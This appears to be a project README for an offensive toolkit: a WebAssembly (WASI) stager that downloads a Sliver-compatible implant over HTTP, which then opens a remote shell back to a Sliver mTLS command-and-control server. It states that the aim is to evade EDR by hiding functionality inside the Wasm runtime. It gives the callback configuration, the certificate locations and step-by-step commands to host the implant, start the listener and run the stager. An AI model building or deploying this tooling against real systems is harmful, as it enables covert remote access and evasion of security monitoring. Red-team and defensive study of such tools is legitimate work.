A stager and Sliver-compatible implant that leverages WebAssembly System Interface (WASI) to create a cross-platform remote access tool. The idea is to bypass EDR by hiding all the functionality within the Wasm runtime.
The toolkit consists of two main components:
- Stager: A WASI runtime that loads and executes the implant module with full system integration
- Implant: A Sliver-compatible Wasm module providing remote shell capabilities and system reconnaissance
The project uses Just as the primary build system for cross-platform automation. All recipes are designed to work on both Windows and Unix systems.
Wasm-stager needs to be configured at build-time with a few things:
implant-url: HTTP URL that the stager will download the implant fromsliver-mtls-host: IP of a listening Sliver mTLS server that the implant will connect back tosliver-mtls-port: Port of a listening Sliver mTLS server that the implant will connect back to
You can specify these by setting them in just like this:
just --set implant-url "http://127.0.0.1:8887/implant.cwasm"Certs for mTLS connection back to a sliver server. These are located in /certs/. When you build Sliver, the certificates are baked into the Sliver Implant source code. You can find them here:
~/.sliver/certs/
These certs are:
mtls-server-ca-cert.pemmtls-implant-ca-cert.pemmtls-implant-ca-key.pem
sudo apt install mingw-w64Or on Mac:
sudo brew install mingw-w64# Install Just command runner
cargo install just
# Build
just
# On another machine. Or on this one in another terminal
# Host the implant over HTTP
cd bin/release/
python3 -m http.server 8887 &
# Run sliver server mtls listener
./sliver-server
mtls -l 9998
# Run the stager
./bin/release/stager